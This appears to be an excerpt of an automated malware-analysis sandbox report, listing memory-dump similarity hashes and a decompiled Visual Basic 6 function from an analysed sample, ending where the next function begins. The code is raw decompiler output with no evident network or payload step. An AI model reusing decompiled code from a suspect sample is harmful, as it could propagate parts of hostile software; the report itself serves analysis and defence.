          • Opcode ID: d5bc71330da895fcafd171f728bc6b06e6943c61aaa9b04461e5a14f51303899
          • Instruction ID: 807dd3baab8600709a7b440030efffc965a1120a2c03b8ffe5ec1f7c825c3629
          • Opcode Fuzzy Hash: d5bc71330da895fcafd171f728bc6b06e6943c61aaa9b04461e5a14f51303899
          • Instruction Fuzzy Hash: 5C3143365043948FC7646F28C9857DF7BA2FF49309F16161DEDC85B212C3365E868B86
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 3c36c2c266ce45498a0e0e432a61730bb85af2722e8c38d376701ff9daa6f90f
          • Instruction ID: 3f39328e1750e27526fb27695982908507195e733076f420b08858cb9d5dc3c0
          • Opcode Fuzzy Hash: 3c36c2c266ce45498a0e0e432a61730bb85af2722e8c38d376701ff9daa6f90f
          • Instruction Fuzzy Hash: 36315C365042904FCB395F3488552DEBB61BB16305F16926ECC6B4F387D624190A9797
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b4092d162501ff32430b514ca5afbb407766aeaa3096d8300074907658512e5e
          • Instruction ID: 38bf0d4d036afe47c3cc4ed95c56c9c51d82d1f766f0035c6f50d327cb991cb0
          • Opcode Fuzzy Hash: b4092d162501ff32430b514ca5afbb407766aeaa3096d8300074907658512e5e
          • Instruction Fuzzy Hash: 6A31DE756413818FD7689F69C8C9ADEBBA0FF19345F51822DDC588B262D7309E888F81
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 86fc441b64d0f85a8f0dedec60c9429e22755cd5e949a5d7e0a2bb9d4b48ff69
          • Instruction ID: 742f7ee1b7545e2141421d423bc457acbc37cce9133df13eb12d06207ce79a81
          • Opcode Fuzzy Hash: 86fc441b64d0f85a8f0dedec60c9429e22755cd5e949a5d7e0a2bb9d4b48ff69
          • Instruction Fuzzy Hash: 4F2149327452908FD7A89FB8CC222EF3B64BB45381F12613EDC4A9B351D7354D498782
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b6c88e857595dec156c71c490ca4f392b0be3e6bdb291cb836b2ca3b14051e90
          • Instruction ID: 527ea45a791fe421cae38125160a0077232728858ee21e3bd7aa6975a4cad34d
          • Opcode Fuzzy Hash: b6c88e857595dec156c71c490ca4f392b0be3e6bdb291cb836b2ca3b14051e90
          • Instruction Fuzzy Hash: D021F2361056D25ED3229B3C881A7DFAF556F13358F46838ECC901B786E3221A4983C2
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 644f85c25e357958f556deccba80ee41b4dfb439dac80e21ff634ef9a8f0a936
          • Instruction ID: 2d78ea5cad05c95a22cb92465ca7018b322ab5805799d059bc2b89b36ef82075
          • Opcode Fuzzy Hash: 644f85c25e357958f556deccba80ee41b4dfb439dac80e21ff634ef9a8f0a936
          • Instruction Fuzzy Hash: EC31F1711083948FDB646F29CE85BEA7BA1FF49305F46050DEEC957251C3799A82CB0B
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 10fd078067cdd3085864e7b2a1873e539036dfc45c6e6840d2c49bdfea3a244c
          • Instruction ID: c4bdc2611387a0c7e4b0026a927b8c42beed8a1dbaaaa6b0b4ac6bc7a24a1ac6
          • Opcode Fuzzy Hash: 10fd078067cdd3085864e7b2a1873e539036dfc45c6e6840d2c49bdfea3a244c
          • Instruction Fuzzy Hash: D9216A315152908FD3585F3888126DFBBA6FFA6344F66A12DDC888B725E2324E85C7C3
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 2c7d609218396ba62f3bc6ecbaa874b527a58d594441d14634aa6a5bef375c89
          • Instruction ID: e2e19820d1f4eeb52b5006db8f3a8130283773ddb014f98ab511fcd3fe0a5433
          • Opcode Fuzzy Hash: 2c7d609218396ba62f3bc6ecbaa874b527a58d594441d14634aa6a5bef375c89
          • Instruction Fuzzy Hash: 193195301487C58BDF72CE78CCA4BC6BB91AF41324F4982ADCC998E29BE3758546C752
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 6d428ed9c7fe478cdb4627c8d3b20f15d77e1ddd5b6a83f81017e5f01344c86a
          • Instruction ID: e29e990a0a83a1f3f7ae258219e835bc505cba454421d382fc99a11bbb7ce3e9
          • Opcode Fuzzy Hash: 6d428ed9c7fe478cdb4627c8d3b20f15d77e1ddd5b6a83f81017e5f01344c86a
          • Instruction Fuzzy Hash: 6621B6351493D10BDB728EB888A47CBBF416B53268F19D2ADCC584F2D7E27645468392
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 5154eac9034a6c3cc8e5de25587430c1ba6bf72ad175959f4e1139264ca15a8a
          • Instruction ID: 2e8b9e19af41ea62e42a0ab5a3d5e0c84f768a3bbb5e5f66c9708abbb1ec637f
          • Opcode Fuzzy Hash: 5154eac9034a6c3cc8e5de25587430c1ba6bf72ad175959f4e1139264ca15a8a
          • Instruction Fuzzy Hash: 31118E397152818FC3896FBCC46119F3F517B57388F26A12DD8859B7A3D4125D4A87C1
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 7c93a0ab3130a38607604b1df140c54ccf854f805f26d0b8845b93af785e4b24
          • Instruction ID: 6f52a352958c2b251be2f1039ca292308776827971e3b63202b9636eecd68d49
          • Opcode Fuzzy Hash: 7c93a0ab3130a38607604b1df140c54ccf854f805f26d0b8845b93af785e4b24
          • Instruction Fuzzy Hash: B2119E31648344DBDBA8AE788D667FA37B1AF45341F01152EDD8B972A0CB3846498B06
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: be60accce07a12478fcc9ddebc2cf54dd90aa88b4fa04a720f4919e6884ecbe7
          • Instruction ID: 6f52073e5588ca89cd13989f5a53116ca1e74ef892b612caf3bd210f63c2b04e
          • Opcode Fuzzy Hash: be60accce07a12478fcc9ddebc2cf54dd90aa88b4fa04a720f4919e6884ecbe7
          • Instruction Fuzzy Hash: 8101F73A5120A20FC35D6AAC98211DF6B45B756389F17A32ADC4A9B342E1114E8947C6
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 2b1aaba46b82e7dde035ca5b79994e045e91f9e9c610fe1c7c1b75310daa31cf
          • Instruction ID: 7752b376072af4f1d73aac8870fdbdf51f91991400ca5556fafc5aad8af51ac8
          • Opcode Fuzzy Hash: 2b1aaba46b82e7dde035ca5b79994e045e91f9e9c610fe1c7c1b75310daa31cf
          • Instruction Fuzzy Hash: BC11B271509304DFD7A8AE35C812ABFB7E2EFA8300F96442DDCCA8A554D7304A81CB47
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 9dfe0524c4fe6da732360730a1ddf5ccef29bb09cf8f742e51c8dbca8d3b32d7
          • Instruction ID: 7ea49f804c7975887bb468855b7cb8c635c198a2b0b3c1510018d6abd6a97045
          • Opcode Fuzzy Hash: 9dfe0524c4fe6da732360730a1ddf5ccef29bb09cf8f742e51c8dbca8d3b32d7
          • Instruction Fuzzy Hash: C8018C71304244DFCB34CF18C9C4ADA73A6BF5A711F40012AEC098B3A6C334AD02CB0A
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: eb5a284d913f857b997ff7f9ad2b42cc15d07cd639d85dfd6cb87da29d1818d2
          • Instruction ID: e1254450744534ffe6255ca09c18225231dc66a258bf9b7730db9817eb55af42
          • Opcode Fuzzy Hash: eb5a284d913f857b997ff7f9ad2b42cc15d07cd639d85dfd6cb87da29d1818d2
          • Instruction Fuzzy Hash: 4EC02B5BD28026240691347F37441DE4C0292C3E523028F7F7808A394FFC45CE49044A
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 1983be40eaf3e324ee9700356841e951f3c73799d86dfd79c3317d321aefb8ca
          • Instruction ID: b4cf9d7a93a10f04ed77efb89053a12732d0a4e5e1be50b4a24bc5e4e8ddecdb
          • Opcode Fuzzy Hash: 1983be40eaf3e324ee9700356841e951f3c73799d86dfd79c3317d321aefb8ca
          • Instruction Fuzzy Hash: 3BB092B33815808FEF02CF08C591B8073A0FB11A88B0804D0E042CB612C224E900CA04
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000006.00000002.692429945.0000000000450000.00000040.00000001.sdmp, Offset: 00450000, based on PE: false
          Yara matches
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: bfd6bfd9c4c013ad135fe02dd07c9f55146ab60886644274d1ec0ec188ed0a84
          • Instruction ID: 74d3cb2ff3ee8406bfe8ba8363eac96568f3d5643ff51b2a858936f2b59cea93
          • Opcode Fuzzy Hash: bfd6bfd9c4c013ad135fe02dd07c9f55146ab60886644274d1ec0ec188ed0a84
          • Instruction Fuzzy Hash: 52B09238311B408FC251CE19C180F8073A0FB04B60B810680E82187BA1C368E9008900
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 65%
          			E0041B1A7(void* __ebx, void* __ecx, void* __edi, void* __esi) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				intOrPtr _v16;
          				intOrPtr _v20;
          				void* _v32;
          				void* _v36;
          				long long _v44;
          				void* _v48;
          				void* _v52;
          				intOrPtr _v64;
          				char _v76;
          				void* _v84;
          				signed int _v88;
          				char _v92;
          				long long _v100;
          				char _v108;
          				intOrPtr _v116;
          				char _v124;
          				intOrPtr _v132;
          				char _v140;
          				intOrPtr _v148;
          				signed int _v156;
          				signed int _v164;
          				char _v172;
          				char _v192;
          				signed int _v196;
          				signed int _v200;
          				intOrPtr* _v204;
          				signed int _v208;
          				char _v224;
          				signed int _v228;
          				intOrPtr* _v232;
          				signed int _v236;
          				signed int _v240;
          				signed int _v244;
          				signed int _v248;
          				signed int _v252;
          				signed int _v256;
          				signed int _v260;
          				signed int _v264;
          				signed int _v268;
          				signed int _v272;
          				signed int _v276;
          				signed int _v280;
          				signed int _v284;
          				intOrPtr* _v288;
          				signed int _v292;
          				signed int _v296;
          				signed int _t224;
          				signed int _t231;
          				char* _t236;
          				signed int _t242;
          				signed int _t247;
          				char _t248;
          				signed int _t256;
          				signed int _t261;
          				void* _t335;
          				intOrPtr _t336;
          				long long* _t337;
          				long long _t343;
          
          				_t336 = _t335 - 0x10;
          				_push(0x4011c6);
          				_push( *[fs:0x0]);
          				 *[fs:0x0] = _t336;
          				L004011C0();
          				_v20 = _t336;
          				_v16 = 0x4011b0;
          				_v12 = 0;
          				_v8 = 0;
          				_push(0x11);
          				_push(0x403004);
          				_push( &_v76);
          				L004012AA();
          				_v100 =  *0x4011a8;
          				_v108 = 5;
          				_push(0);
          				_push( &_v108);
          				_push( &_v124);
          				L0040126E();
          				_v164 = 1;
          				_v172 = 0x8002;
          				_push( &_v124);
          				_t224 =  &_v172;
          				_push(_t224);
          				L004012E0();
          				_v196 = _t224;
          				_push( &_v124);
          				_push( &_v108);
          				_push(2);
          				L004012EC();
          				_t337 = _t336 + 0xc;
          				if(_v196 == 0) {
          					_v148 = 0x402fe0;
          					_v156 = 8;
          					L004012D4();
          					_push(1);
          					_push( &_v108);
          					_push( &_v124);
          					L00401256();
          					_v164 = 0x402fec;
          					_v172 = 0x8008;
          					_push( &_v124);
          					_t231 =  &_v172;
          					_push(_t231);
          					L004012E0();
          					_v196 = _t231;
          					_push( &_v124);
          					_push( &_v108);
          					_push(2);
          					L004012EC();
          					if(_v196 != 0) {
          						if( *0x41c614 != 0) {
          							_v232 = 0x41c614;
          						} else {
          							_push(0x41c614);
          							_push(0x402e90);
          							L00401304();
          							_v232 = 0x41c614;
          						}
          						_v196 =  *_v232;
          						_t242 =  *((intOrPtr*)( *_v196 + 0x14))(_v196,  &_v92);
          						asm("fclex");
          						_v200 = _t242;
          						if(_v200 >= 0) {
          							_v236 = _v236 & 0x00000000;
          						} else {
          							_push(0x14);
          							_push(0x402e80);
          							_push(_v196);
          							_push(_v200);
          							L00401352();
          							_v236 = _t242;
          						}
          						_v204 = _v92;
          						_t247 =  *((intOrPtr*)( *_v204 + 0x58))(_v204,  &_v88);
          						asm("fclex");
          						_v208 = _t247;
          						if(_v208 >= 0) {
          							_v240 = _v240 & 0x00000000;
          						} else {
          							_push(0x58);
          							_push(0x402ea0);
          							_push(_v204);
          							_push(_v208);
          							L00401352();
          							_v240 = _t247;
          						}
          						_t248 = _v88;
          						_v224 = _t248;
          						_v88 = _v88 & 0x00000000;
          						L00401322();
          						L0040132E();
          						_v196 = _v196 & 0x00000000;
          						if(_v196 >= 0xc) {
          							L00401298();
          							_v244 = _t248;
          						} else {
          							_v244 = _v244 & 0x00000000;
          						}
          						L00401292();
          						 *((char*)(_v64 + _v196)) = _t248;
          						_v196 = 1;
          						if(_v196 >= 0xc) {
          							L00401298();
          							_v248 = _t248;
          						} else {
          							_v248 = _v248 & 0x00000000;
          						}
          						L00401292();
          						 *((char*)(_v64 + _v196)) = _t248;
          						_v196 = 2;
          						if(_v196 >= 0xc) {
          							L00401298();
          							_v252 = _t248;
          						} else {
          							_v252 = _v252 & 0x00000000;
          						}
          						L00401292();
          						 *((char*)(_v64 + _v196)) = _t248;
          						_v196 = 3;
          						if(_v196 >= 0xc) {
          							L00401298();
          							_v256 = _t248;
          						} else {
          							_v256 = _v256 & 0x00000000;
          						}
          						L00401292();
          						 *((char*)(_v64 + _v196)) = _t248;
          						_v196 = 4;
          						if(_v196 >= 0xc) {
          							L00401298();
          							_v260 = _t248;
          						} else {
          							_v260 = _v260 & 0x00000000;
          						}
          						L00401292();
          						 *((char*)(_v64 + _v196)) = _t248;
          						_v196 = 5;
          						if(_v196 >= 0xc) {
          							L00401298();
          							_v264 = _t248;
          						} else {
          							_v264 = _v264 & 0x00000000;
          						}
          						L00401292();
          						 *((char*)(_v64 + _v196)) = _t248;
          						_v196 = 6;
          						if(_v196 >= 0xc) {
          							L00401298();
          							_v268 = _t248;
          						} else {
          							_v268 = _v268 & 0x00000000;
          						}
          						L00401292();
          						 *((char*)(_v64 + _v196)) = _t248;
          						_v196 = 7;
          						if(_v196 >= 0xc) {
          							L00401298();
          							_v272 = _t248;
          						} else {
          							_v272 = _v272 & 0x00000000;
          						}
          						L00401292();
          						 *((char*)(_v64 + _v196)) = _t248;
          						_v196 = 8;
          						if(_v196 >= 0xc) {
          							L00401298();
          							_v276 = _t248;
          						} else {
          							_v276 = _v276 & 0x00000000;
          						}
          						L00401292();
          						 *((char*)(_v64 + _v196)) = _t248;
          						_v196 = 9;
          						if(_v196 >= 0xc) {
          							L00401298();
          							_v280 = _t248;
          						} else {
          							_v280 = _v280 & 0x00000000;
          						}
          						L00401292();
          						 *((char*)(_v64 + _v196)) = _t248;
          						_v196 = 0xa;
          						if(_v196 >= 0xc) {
          							L00401298();
          							_v284 = _t248;
          						} else {
          							_v284 = _v284 & 0x00000000;
          						}
          						L00401292();
          						 *((char*)(_v64 + _v196)) = _t248;
          						_push(L"1:1:1");
          						_push( &_v108);
          						L00401316();
          						_push( &_v108);
          						L0040131C();
          						L00401322();
          						L00401334();
          						if( *0x41c614 != 0) {
          							_v288 = 0x41c614;
          						} else {
          							_push(0x41c614);
          							_push(0x402e90);
          							L00401304();
          							_v288 = 0x41c614;
          						}
          						_v196 =  *_v288;
          						_t256 =  *((intOrPtr*)( *_v196 + 0x14))(_v196,  &_v92);
          						asm("fclex");
          						_v200 = _t256;
          						if(_v200 >= 0) {
          							_v292 = _v292 & 0x00000000;
          						} else {
          							_push(0x14);
          							_push(0x402e80);
          							_push(_v196);
          							_push(_v200);
          							L00401352();
          							_v292 = _t256;
          						}
          						_v204 = _v92;
          						_t261 =  *((intOrPtr*)( *_v204 + 0x110))(_v204,  &_v88);
          						asm("fclex");
          						_v208 = _t261;
          						if(_v208 >= 0) {
          							_v296 = _v296 & 0x00000000;
          						} else {
          							_push(0x110);
          							_push(0x402ea0);
          							_push(_v204);
          							_push(_v208);
          							L00401352();
          							_v296 = _t261;
          						}
          						_v228 = _v88;
          						_v88 = _v88 & 0x00000000;
          						L00401322();
          						L0040132E();
          						L00401250();
          					}
          				} else {
          					_push(0);
          					L00401268();
          					_v132 = 0x80020004;
          					_v140 = 0xa;
          					_v116 = 0x80020004;
          					_v124 = 0xa;
          					_v100 = 0x80020004;
          					_v108 = 0xa;
          					_push( &_v140);
          					_push( &_v124);
          					_push( &_v108);
          					_t343 =  *0x401150;
          					 *_t337 = _t343;
          					asm("fld1");
          					 *_t337 = _t343;
          					asm("fld1");
          					 *_t337 = _t343;
          					L004012F2();
          					_v44 = _t343;
          					_push( &_v140);
          					_push( &_v124);
          					_push( &_v108);
          					_push(3);
          					L004012EC();
          					_v100 = 2;
          					_v108 = 2;
          					_push( &_v108);
          					_push( &_v124);
          					L00401262();
          					_push( &_v124);
          					L0040131C();
          					L00401322();
          					_push( &_v124);
          					_push( &_v108);
          					_push(2);
          					L004012EC();
          					_v100 = 1;
          					_v108 = 2;
          					_push(0xfffffffe);
          					_push(0xfffffffe);
          					_push(0xfffffffe);
          					_push(0xffffffff);
          					_push( &_v108);
          					L0040125C();
          					L00401322();
          					L00401334();
          				}
          				asm("wait");
          				_push(0x41b900);
          				L00401310();
          				L00401310();
          				L00401310();
          				L00401310();
          				_v192 =  &_v76;
          				_t236 =  &_v192;
          				_push(_t236);
          				_push(0);
          				L00401274();
          				L00401310();
          				return _t236;
          			}































































          0x0041b1aa
          0x0041b1ad
          0x0041b1b8
          0x0041b1b9
          0x0041b1c5
          0x0041b1cd
          0x0041b1d0
          0x0041b1d7
          0x0041b1de
          0x0041b1e5
          0x0041b1e7
          0x0041b1ef
          0x0041b1f0
          0x0041b1fb
          0x0041b1fe
          0x0041b205
          0x0041b20a
          0x0041b20e
          0x0041b20f
          0x0041b214
          0x0041b21e
          0x0041b22b
          0x0041b22c
          0x0041b232
          0x0041b233
          0x0041b238
          0x0041b242
          0x0041b246
          0x0041b247
          0x0041b249
          0x0041b24e
          0x0041b25a
          0x0041b353
          0x0041b35d
          0x0041b370
          0x0041b375
          0x0041b37a
          0x0041b37e
          0x0041b37f
          0x0041b384
          0x0041b38e
          0x0041b39b
          0x0041b39c
          0x0041b3a2
          0x0041b3a3
          0x0041b3a8
          0x0041b3b2
          0x0041b3b6
          0x0041b3b7
          0x0041b3b9
          0x0041b3ca
          0x0041b3d7
          0x0041b3f4
          0x0041b3d9
          0x0041b3d9
          0x0041b3de
          0x0041b3e3
          0x0041b3e8
          0x0041b3e8
          0x0041b406
          0x0041b41e
          0x0041b421
          0x0041b423
          0x0041b430
          0x0041b452
          0x0041b432
          0x0041b432
          0x0041b434
          0x0041b439
          0x0041b43f
          0x0041b445
          0x0041b44a
          0x0041b44a
          0x0041b45c
          0x0041b474
          0x0041b477
          0x0041b479
          0x0041b486
          0x0041b4a8
          0x0041b488
          0x0041b488
          0x0041b48a
          0x0041b48f
          0x0041b495
          0x0041b49b
          0x0041b4a0
          0x0041b4a0
          0x0041b4af
          0x0041b4b2
          0x0041b4b8
          0x0041b4c5
          0x0041b4cd
          0x0041b4d2
          0x0041b4e0
          0x0041b4eb
          0x0041b4f0
          0x0041b4e2
          0x0041b4e2
          0x0041b4e2
          0x0041b4fa
          0x0041b508
          0x0041b50a
          0x0041b51b
          0x0041b526
          0x0041b52b
          0x0041b51d
          0x0041b51d
          0x0041b51d
          0x0041b535
          0x0041b543
          0x0041b545
          0x0041b556
          0x0041b561
          0x0041b566
          0x0041b558
          0x0041b558
          0x0041b558
          0x0041b570
          0x0041b57e
          0x0041b580
          0x0041b591
          0x0041b59c
          0x0041b5a1
          0x0041b593
          0x0041b593
          0x0041b593
          0x0041b5ab
          0x0041b5b9
          0x0041b5bb
          0x0041b5cc
          0x0041b5d7
          0x0041b5dc
          0x0041b5ce
          0x0041b5ce
          0x0041b5ce
          0x0041b5e6
          0x0041b5f4
          0x0041b5f6
          0x0041b607
          0x0041b612
          0x0041b617
          0x0041b609
          0x0041b609
          0x0041b609
          0x0041b621
          0x0041b62f
          0x0041b631
          0x0041b642
          0x0041b64d
          0x0041b652
          0x0041b644
          0x0041b644
          0x0041b644
          0x0041b65c
          0x0041b66a
          0x0041b66c
          0x0041b67d
          0x0041b688
          0x0041b68d
          0x0041b67f
          0x0041b67f
          0x0041b67f
          0x0041b697
          0x0041b6a5
          0x0041b6a7
          0x0041b6b8
          0x0041b6c3
          0x0041b6c8
          0x0041b6ba
          0x0041b6ba
          0x0041b6ba
          0x0041b6d2
          0x0041b6e0
          0x0041b6e2
          0x0041b6f3
          0x0041b6fe
          0x0041b703
          0x0041b6f5
          0x0041b6f5
          0x0041b6f5
          0x0041b70d
          0x0041b71b
          0x0041b71d
          0x0041b72e
          0x0041b739
          0x0041b73e
          0x0041b730
          0x0041b730
          0x0041b730
          0x0041b748
          0x0041b756
          0x0041b758
          0x0041b760
          0x0041b761
          0x0041b769
          0x0041b76a
          0x0041b774
          0x0041b77c
          0x0041b788
          0x0041b7a5
          0x0041b78a
          0x0041b78a
          0x0041b78f
          0x0041b794
          0x0041b799
          0x0041b799
          0x0041b7b7
          0x0041b7cf
          0x0041b7d2
          0x0041b7d4
          0x0041b7e1
          0x0041b803
          0x0041b7e3
          0x0041b7e3
          0x0041b7e5
          0x0041b7ea
          0x0041b7f0
          0x0041b7f6
          0x0041b7fb
          0x0041b7fb
          0x0041b80d
          0x0041b825
          0x0041b82b
          0x0041b82d
          0x0041b83a
          0x0041b85f
          0x0041b83c
          0x0041b83c
          0x0041b841
          0x0041b846
          0x0041b84c
          0x0041b852
          0x0041b857
          0x0041b857
          0x0041b869
          0x0041b86f
          0x0041b87c
          0x0041b884
          0x0041b889
          0x0041b889
          0x0041b260
          0x0041b260
          0x0041b262
          0x0041b267
          0x0041b26e
          0x0041b278
          0x0041b27f
          0x0041b286
          0x0041b28d
          0x0041b29a
          0x0041b29e
          0x0041b2a2
          0x0041b2a3
          0x0041b2ab
          0x0041b2ae
          0x0041b2b2
          0x0041b2b5
          0x0041b2b9
          0x0041b2bc
          0x0041b2c1
          0x0041b2ca
          0x0041b2ce
          0x0041b2d2
          0x0041b2d3
          0x0041b2d5
          0x0041b2dd
          0x0041b2e4
          0x0041b2ee
          0x0041b2f2
          0x0041b2f3
          0x0041b2fb
          0x0041b2fc
          0x0041b306
          0x0041b30e
          0x0041b312
          0x0041b313
          0x0041b315
          0x0041b31d
          0x0041b324
          0x0041b32b
          0x0041b32d
          0x0041b32f
          0x0041b331
          0x0041b336
          0x0041b337
          0x0041b341
          0x0041b349
          0x0041b349
          0x0041b88e
          0x0041b88f
          0x0041b8c3
          0x0041b8cb
          0x0041b8d3
          0x0041b8db
          0x0041b8e3
          0x0041b8e9
          0x0041b8ef
          0x0041b8f0
          0x0041b8f2
          0x0041b8fa
          0x0041b8ff

          APIs
          • __vbaChkstk.MSVBVM60(?,004011C6), ref: 0041B1C5
          • __vbaAryConstruct2.MSVBVM60(?,00403004,00000011,?,?,?,?,004011C6), ref: 0041B1F0
          • #714.MSVBVM60(?,00000005,00000000), ref: 0041B20F
          • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B233
          • __vbaFreeVarList.MSVBVM60(00000002,00000005,?,00008002,?), ref: 0041B249
          • __vbaOnError.MSVBVM60(00000000,?,?,004011C6), ref: 0041B262
          • #680.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 0041B2BC
          • __vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A,?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 0041B2D5
          • #613.MSVBVM60(?,00000002), ref: 0041B2F3
          • __vbaStrVarMove.MSVBVM60(?,?,00000002), ref: 0041B2FC
          • __vbaStrMove.MSVBVM60(?,?,00000002), ref: 0041B306
          • __vbaFreeVarList.MSVBVM60(00000002,00000002,?,?,?,00000002), ref: 0041B315
          • #703.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041B337
          • __vbaStrMove.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041B341
          • __vbaFreeVar.MSVBVM60(00000002,000000FF,000000FE,000000FE,000000FE), ref: 0041B349
          • __vbaVarDup.MSVBVM60 ref: 0041B370
          • #617.MSVBVM60(?,?,00000001), ref: 0041B37F
          • __vbaVarTstNe.MSVBVM60(?,?,?,?,00000001), ref: 0041B3A3
          • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,00000001), ref: 0041B3B9
          • __vbaNew2.MSVBVM60(00402E90,0041C614,?,?,?,?,?,004011C6), ref: 0041B3E3
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402E80,00000014), ref: 0041B445
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402EA0,00000058), ref: 0041B49B
          • __vbaStrMove.MSVBVM60(00000000,?,00402EA0,00000058), ref: 0041B4C5
          • __vbaFreeObj.MSVBVM60(00000000,?,00402EA0,00000058), ref: 0041B4CD
          • __vbaUI1I2.MSVBVM60 ref: 0041B4FA
          • __vbaUI1I2.MSVBVM60 ref: 0041B535
          • __vbaFreeStr.MSVBVM60(0041B900,?,?,?,?,?,004011C6), ref: 0041B8C3
          • __vbaFreeStr.MSVBVM60(0041B900,?,?,?,?,?,004011C6), ref: 0041B8CB
          • __vbaFreeStr.MSVBVM60(0041B900,?,?,?,?,?,004011C6), ref: 0041B8D3
          • __vbaFreeStr.MSVBVM60(0041B900,?,?,?,?,?,004011C6), ref: 0041B8DB
          • __vbaAryDestruct.MSVBVM60(00000000,?,0041B900,?,?,?,?,?,004011C6), ref: 0041B8F2
          • __vbaFreeStr.MSVBVM60(00000000,?,0041B900,?,?,?,?,?,004011C6), ref: 0041B8FA
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692270071.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000006.00000002.692260307.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000006.00000002.692368714.000000000041C000.00000004.00020000.sdmp Download File
          • Associated: 00000006.00000002.692383099.000000000041F000.00000004.00020000.sdmp Download File
          • Associated: 00000006.00000002.692403050.0000000000421000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: __vba$Free$ListMove$CheckHresult$#613#617#680#703#714ChkstkConstruct2DestructErrorNew2
          • String ID: 1:1:1
          • API String ID: 2873038774-2485858058
          • Opcode ID: 66dd338439de34cfae36b4178170927f18a39933c0f6eff369bb79a183c35876
          • Instruction ID: e78a9780489566d8537aef7e99f7065ec86bd70d04367550f7be771363a59215
          • Opcode Fuzzy Hash: 66dd338439de34cfae36b4178170927f18a39933c0f6eff369bb79a183c35876
          • Instruction Fuzzy Hash: FA12D871801218DAEB24EB95CC45BEDB7B4FF15308F1046EEE509B72A1DB781A88CF59
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 52%
          			E00419A92(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
          				intOrPtr _v8;
